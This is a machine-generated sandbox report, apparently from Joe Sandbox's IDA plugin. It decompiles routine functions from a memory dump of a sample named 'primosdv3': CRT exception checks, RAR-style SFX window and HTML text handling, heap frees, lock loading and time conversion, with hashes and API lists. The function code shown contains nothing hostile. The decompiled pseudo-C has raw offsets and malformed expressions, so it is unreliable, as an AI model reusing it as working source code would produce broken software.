0x00c8296d
0x00c82970
0x00c82973
0x00c82976
0x00c82979
0x00c8297e
0x00c82994
0x00000000
0x00c82980
0x00c82980
0x00c82982
0x00c82987
0x00c82989
0x00c8298c
0x00c8298e
0x00c829a4
0x00c829c4
0x00c829c4
0x00c829c8
0x00000000
0x00c82990
0x00c82990
0x00c829da
0x00c829dd
0x00c829e3
0x00c829e5
0x00c829ec
0x00c829f3
0x00c829f8
0x00c829fb
0x00c829fd
0x00c829ff
0x00c82a0c
0x00c82a12
0x00c82a14
0x00c82a17
0x00c82a17
0x00c82a1a
0x00c82a1a
0x00c829ec
0x00c82a20
0x00c82a22
0x00c82a27
0x00c82a2a
0x00c82a2d
0x00c82a35
0x00c82a39
0x00c82a3e
0x00c82a3e
0x00c82a41
0x00c82a45
0x00c82a48
0x00c82a55
0x00c82a58
0x00c82a5d
0x00c82a63
0x00c82a65
0x00c82a6a
0x00c82a6f
0x00c82a71
0x00c82a7c
0x00c82a73
0x00c82a73
0x00000000
0x00c82a73
0x00c82a67
0x00c82a67
0x00c82a67
0x00c82a69
0x00c82a69
0x00c82992
0x00000000
0x00c82992
0x00c82990
0x00c8298e
0x00000000
0x00c82997
0x00c82997
0x00c82999
0x00c829a0
0x00000000
0x00c829a2
0x00000000
0x00c829a0
0x00c82965
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00C82937
___except_validate_context_record.LIBVCRUNTIME ref: 00C8293F
_ValidateLocalCookies.LIBCMT ref: 00C829C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00C829F3
_ValidateLocalCookies.LIBCMT ref: 00C82A48

Strings

csm, xrefs: 00C829DD

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a92e546902aa73034d014fe40b3cf887e039dac1f2335719b47ad81cdbb764a8
Instruction ID: 256ca9c7291296c11d5c280c619319f4173dad98a6b439cacc891e0721742189
Opcode Fuzzy Hash: a92e546902aa73034d014fe40b3cf887e039dac1f2335719b47ad81cdbb764a8
Instruction Fuzzy Hash: A341D634A00248AFCF14EF68C889A9E7BF5EF44328F148055E815AB392D731DA01DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00C79ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00C79ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00C79C04(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00C83E2E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00C87625(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00C87625(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xcc3108(0,  *0xcc3154(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xcc3110( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xcc3118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xcc3154(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xcc310c( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00C79CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L00C83E2E(_t67);
							}
						}
					}
				}
				return _t44;
			}

0x00c79ede
0x00c79ee2
0x00c79ee8
0x00c79eeb
0x00c79eee
0x00c79efa
0x00c79f03
0x00c79f08
0x00c79f0d
0x00c79f13
0x00c79f19
0x00c79f1d
0x00c79f15
0x00c79f15
0x00c79f15
0x00c79f28
0x00c79f2b
0x00c79f31
0x00c79f35
0x00c79f2d
0x00c79f2d
0x00c79f2d
0x00c79f3b
0x00c79f44
0x00c79f5b
0x00c79f65
0x00c79f6a
0x00c79f6a
0x00c79f70
0x00c79f7e
0x00c79fab
0x00c79fb1
0x00c79fb8
0x00c79ff2
0x00c79ff4
0x00c79ff9
0x00000000
0x00c7a002
0x00c79fba
0x00c79fbc
0x00c79fc3
0x00c79fc6
0x00c79fcd
0x00c79fd2
0x00c79fd6
0x00c79fdb
0x00c79fe3
0x00000000
0x00c79fef
0x00c79fd6
0x00c79fc6
0x00c79fbc
0x00c7a00e

APIs

ShowWindow.USER32(?,00000000), ref: 00C79EEE
GetWindowRect.USER32(?,00000000), ref: 00C79F44
ShowWindow.USER32(?,00000005,00000000), ref: 00C79FDB
SetWindowTextW.USER32(?,00000000), ref: 00C79FE3
ShowWindow.USER32(00000000,00000005), ref: 00C79FF9

Strings

RarHtmlClassName, xrefs: 00C79FA5

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 97ca9c5e780cfcf56fabfa1f564ae53fb6282a2a80f6e0cde7813d073ab97645
Instruction ID: 72cf7e0166a662288159ab6c41e86a893e9e83a4325f2dba17676dd8d09e38a3
Opcode Fuzzy Hash: 97ca9c5e780cfcf56fabfa1f564ae53fb6282a2a80f6e0cde7813d073ab97645
Instruction Fuzzy Hash: 4241C032104210AFCB21AFA5EC48F6F7BB8FF48701F04C559F84A9A056DB34DA05DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C79955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C79955(void* __edx, void* __eflags) {
				void* __ecx;
				signed int _t25;
				void* _t29;
				signed int _t30;
				intOrPtr _t31;
				void* _t35;
				signed int _t38;
				signed int _t45;
				void* _t51;
				signed short* _t52;
				void* _t53;
				signed short* _t55;
				signed short* _t57;
				signed short* _t58;
				void* _t59;
				void* _t60;

				_t57 =  *(_t59 + 0x10);
				_push(0x200 + E00C83E13(_t57) * 0xc);
				_t52 = E00C83E33(0x200 + E00C83E13(_t57) * 0xc);
				 *(_t59 + 0x10) = _t52;
				if(_t52 != 0) {
					E00C86066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t38 = E00C83E13(_t52);
					_t60 = _t59 + 0xc;
					_t25 =  *_t57 & 0x0000ffff;
					_t55 = _t57;
					if(_t25 == 0) {
						L19:
						_t52[_t38] = 0;
						L00C83E2E(_t57);
						return _t52;
					}
					_t45 = _t25;
					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
					_t29 = 0xd;
					_t51 = 0xa;
					do {
						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
							if(_t55 <= _t57) {
								L17:
								_t52[_t38] = _t45;
								_t38 = _t38 + 1;
								goto L18;
							}
							_t31 =  *((intOrPtr*)(_t60 + 0x14));
							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
								goto L17;
							} else {
								E00C86066( &(_t52[_t38]), L"&nbsp;");
								_t38 = _t38 + 6;
								goto L16;
							}
						} else {
							_t58 =  &(_t52[_t38]);
							_t53 = 0xa;
							while(_t55[3] == _t53) {
								E00C86066(_t58, L"<br>");
								_t55 =  &(_t55[2]);
								_t38 = _t38 + 4;
								_t35 = 0xd;
								_t58 =  &(_t58[4]);
								if(_t55[2] == _t35) {
									continue;
								}
								break;
							}
							_t52 =  *(_t60 + 0x10);
							_t55 =  &(_t55[1]);
							_t57 =  *(_t60 + 0x1c);
							L16:
							_t51 = 0xa;
						}
						L18:
						_t55 =  &(_t55[1]);
						_t30 =  *_t55 & 0x0000ffff;
						_t45 = _t30;
						_t29 = 0xd;
					} while (_t30 != 0);
					goto L19;
				}
				return _t57;
			}

0x00c79958
0x00c7996c
0x00c79972
0x00c79974
0x00c7997c
0x00c7998d
0x00c79998
0x00c7999a
0x00c7999d
0x00c799a1
0x00c799a6
0x00c79a4f
0x00c79a52
0x00c79a56
0x00000000
0x00c79a5f
0x00c799ae
0x00c799b0
0x00c799b8
0x00c799bb
0x00c799bc
0x00c799bf
0x00c79a0d
0x00c79a36
0x00c79a36
0x00c79a3a
0x00000000
0x00c79a3a
0x00c79a0f
0x00c79a16
0x00000000
0x00c79a1e
0x00c79a27
0x00c79a2e
0x00000000
0x00c79a2e
0x00c799d3
0x00c799d5
0x00c799d8
0x00c799d9
0x00c799e5
0x00c799ec
0x00c799ef
0x00c799f4
0x00c799f5
0x00c799fc
0x00000000
0x00000000
0x00000000
0x00c799fc
0x00c799fe
0x00c79a02
0x00c79a05
0x00c79a31
0x00c79a33
0x00c79a33
0x00c79a3b
0x00c79a3b
0x00c79a40
0x00c79a43
0x00c79a48
0x00c79a48
0x00000000
0x00c799bc
0x00000000

APIs

_wcslen.LIBCMT ref: 00C7995E
_wcslen.LIBCMT ref: 00C79993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00C79987
, xrefs: 00C799B0
<br>, xrefs: 00C799DF
 , xrefs: 00C79A21

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 61241f2d1d4d80f65708dd83f1b6508c2668d342e06a337bcd7d7fe6aff74eb3
Instruction ID: fc7b1df64029b6e1c4e873a2bcf5f03cb9bb2d1dbc0a7100da775a2c209b03a1
Opcode Fuzzy Hash: 61241f2d1d4d80f65708dd83f1b6508c2668d342e06a337bcd7d7fe6aff74eb3
Instruction Fuzzy Hash: 13317D3264434566EA34BB549C42B7A73A4EB90734F50C42FF5AE47280FB70AF4193A9

Uniqueness

Uniqueness Score: -1.00%

Function 00C8C8A4 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C8C8A4(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00C8C868(_t45, 7);
					E00C8C868(_t45 + 0x1c, 7);
					E00C8C868(_t45 + 0x38, 0xc);
					E00C8C868(_t45 + 0x68, 0xc);
					E00C8C868(_t45 + 0x98, 2);
					E00C88DCC( *((intOrPtr*)(_t45 + 0xa0)));
					E00C88DCC( *((intOrPtr*)(_t45 + 0xa4)));
					E00C88DCC( *((intOrPtr*)(_t45 + 0xa8)));
					E00C8C868(_t45 + 0xb4, 7);
					E00C8C868(_t45 + 0xd0, 7);
					E00C8C868(_t45 + 0xec, 0xc);
					E00C8C868(_t45 + 0x11c, 0xc);
					E00C8C868(_t45 + 0x14c, 2);
					E00C88DCC( *((intOrPtr*)(_t45 + 0x154)));
					E00C88DCC( *((intOrPtr*)(_t45 + 0x158)));
					E00C88DCC( *((intOrPtr*)(_t45 + 0x15c)));
					return E00C88DCC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00c8c8aa
0x00c8c8af
0x00c8c8b8
0x00c8c8c3
0x00c8c8ce
0x00c8c8d9
0x00c8c8e7
0x00c8c8f2
0x00c8c8fd
0x00c8c908
0x00c8c916
0x00c8c924
0x00c8c935
0x00c8c943
0x00c8c951
0x00c8c95c
0x00c8c967
0x00c8c972
0x00000000
0x00c8c982
0x00c8c987

APIs

Part of subcall function 00C8C868: _free.LIBCMT ref: 00C8C891

_free.LIBCMT ref: 00C8C8F2

Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?), ref: 00C88DE2
Part of subcall function 00C88DCC: GetLastError.KERNEL32(?,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?,?), ref: 00C88DF4

_free.LIBCMT ref: 00C8C8FD
_free.LIBCMT ref: 00C8C908
_free.LIBCMT ref: 00C8C95C
_free.LIBCMT ref: 00C8C967
_free.LIBCMT ref: 00C8C972
_free.LIBCMT ref: 00C8C97D

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: f0865281a3ce939608f327af74acc888ce43089d2a180d13d09d2ddea587222b
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 5D1166715C0705B6E520B771CC8BFCB7BADDF00B08F400C15B29D665D2EA75B909A764

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00C7E5EE() {
				intOrPtr _t3;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t15;

				_t3 =  *0xcc1cd8;
				if(_t3 == 1) {
					L11:
					return 0;
				}
				if(_t3 != 0) {
					return 1;
				}
				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t15 != 0) {
					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
					if(_t7 == 0) {
						goto L3;
					}
					 *0xcc1cdc = _t7;
					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
					if(_t10 == 0) {
						goto L3;
					}
					 *0xcc1ce0 = _t10;
					L7:
					asm("lock cmpxchg [edx], ecx");
					if(0 != 0 || _t15 != 1) {
						return 0xbadbad;
					} else {
						goto L11;
					}
				}
				L3:
				_t15 = 1;
				goto L7;
			}

0x00c7e5ee
0x00c7e5fa
0x00c7e65f
0x00000000
0x00c7e65f
0x00c7e5fe
0x00000000
0x00c7e65b
0x00c7e60b
0x00c7e60f
0x00c7e61b
0x00c7e623
0x00000000
0x00000000
0x00c7e62b
0x00c7e630
0x00c7e638
0x00000000
0x00000000
0x00c7e63a
0x00c7e63f
0x00c7e648
0x00c7e64e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7e64e
0x00c7e611
0x00c7e611
0x00000000

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00C7E669,00C7E5CC,00C7E86D), ref: 00C7E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00C7E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00C7E630

Strings

ReleaseSRWLockExclusive, xrefs: 00C7E625
KERNEL32.DLL, xrefs: 00C7E600
AcquireSRWLockExclusive, xrefs: 00C7E615

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
Instruction ID: c7943a20c59d88692b268cc5a06ffbd370debe0f59509035ed562c9d5a37292d
Opcode Fuzzy Hash: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
Instruction Fuzzy Hash: E6F02B737906769F4F225F769C88B6E22C86B2E78131584F9FD1DD3101EB20CE609B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C7146A Relevance: 9.1, APIs: 6, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00C7146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				signed int _t56;
				signed int _t70;
				signed int _t72;
				signed int _t77;
				signed int _t85;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int* _t93;

				_t89 = _a4;
				_t93 = __ecx;
				_v48.wYear =  *_t89;
				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					_t90 = 0;
					_t77 = 0;
				} else {
					if(E00C6B146() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, esi");
						asm("adc eax, esi");
						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, esi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t70 = _v72.dwHighDateTime.dwLowDateTime;
						_t85 = _v72.dwLowDateTime;
					}
					_t92 = 0x64;
					_t72 = _t85;
					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
					_t90 = _t72 * _t92;
				}
				 *_t93 = _t90;
				_a4 = _t77;
				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
				asm("adc ecx, ebx");
				 *_t93 = _t56;
				_a4 = 0;
				return _t56;
			}

0x00c71471
0x00c71475
0x00c7147a
0x00c71483
0x00c7148c
0x00c71495
0x00c7149e
0x00c714a7
0x00c714ae
0x00c714b3
0x00c714ca
0x00c7156c
0x00c7156e
0x00c714d0
0x00c714da
0x00c71500
0x00c71513
0x00c71523
0x00c71533
0x00c7153f
0x00c71545
0x00c7154d
0x00c71553
0x00c71555
0x00c71559
0x00c714dc
0x00c714e6
0x00c714ec
0x00c714f0
0x00c714f0
0x00c7155d
0x00c71562
0x00c71566
0x00c71568
0x00c71568
0x00c71570
0x00c71575
0x00c7157b
0x00c7157e
0x00c71580
0x00c71584
0x00c7158c

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00C714C2

Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C714E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C71500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00C71513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71533

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
Instruction ID: 3d7eeeba6e6e439fac26823834a9bdcaa98d6ccb672954a67b04da99ed9b2339
Opcode Fuzzy Hash: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
Instruction Fuzzy Hash: 6B31EA75108345ABC704DFA8C88499FB7F8BF98714F04591EF999C3210E734D649CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00C82AFA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00C82AFA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0xc9e7d0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00C83CCD(_t13, __eflags,  *0xc9e7d0);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00C83D08(_t14, __eflags,  *0xc9e7d0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = E00C88DC1(_t16);
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00C83D08(_t18, __eflags,  *0xc9e7d0, 0);
								} else {
									_t8 = E00C83D08(_t18, __eflags,  *0xc9e7d0, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L00C83E2E(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00c82afa
0x00c82b01
0x00c82b14
0x00c82b1b
0x00c82b1d
0x00c82b1e
0x00c82b21
0x00c82b3a
0x00c82b3a
0x00c82b23
0x00c82b23
0x00c82b25
0x00c82b2f
0x00c82b35
0x00c82b36
0x00c82b38
0x00c82b3f
0x00c82b48
0x00c82b4b
0x00c82b4c
0x00c82b4e
0x00c82b62
0x00c82b62
0x00c82b6b
0x00c82b50
0x00c82b57
0x00c82b5d
0x00c82b5e
0x00c82b60
0x00c82b74
0x00c82b76
0x00c82b76
0x00000000
0x00000000
0x00000000
0x00c82b60
0x00c82b79
0x00000000
0x00000000
0x00000000
0x00c82b38
0x00c82b25
0x00c82b81
0x00c82b8b
0x00c82b03
0x00c82b05
0x00c82b05

APIs

GetLastError.KERNEL32(?,?,00C82AF1,00C802FC,00C7FA34), ref: 00C82B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C82B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82B2F
SetLastError.KERNEL32(00000000,00C82AF1,00C802FC,00C7FA34), ref: 00C82B81

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 49160f4cb828c3869ec238d8e1d9156e27e04eab284eca343037ba8c042df5eb
Instruction ID: 2ab14cb6840da6562770abf0d0fd23ccd5131e545bbdce6904346db9c3cd66e7
Opcode Fuzzy Hash: 49160f4cb828c3869ec238d8e1d9156e27e04eab284eca343037ba8c042df5eb
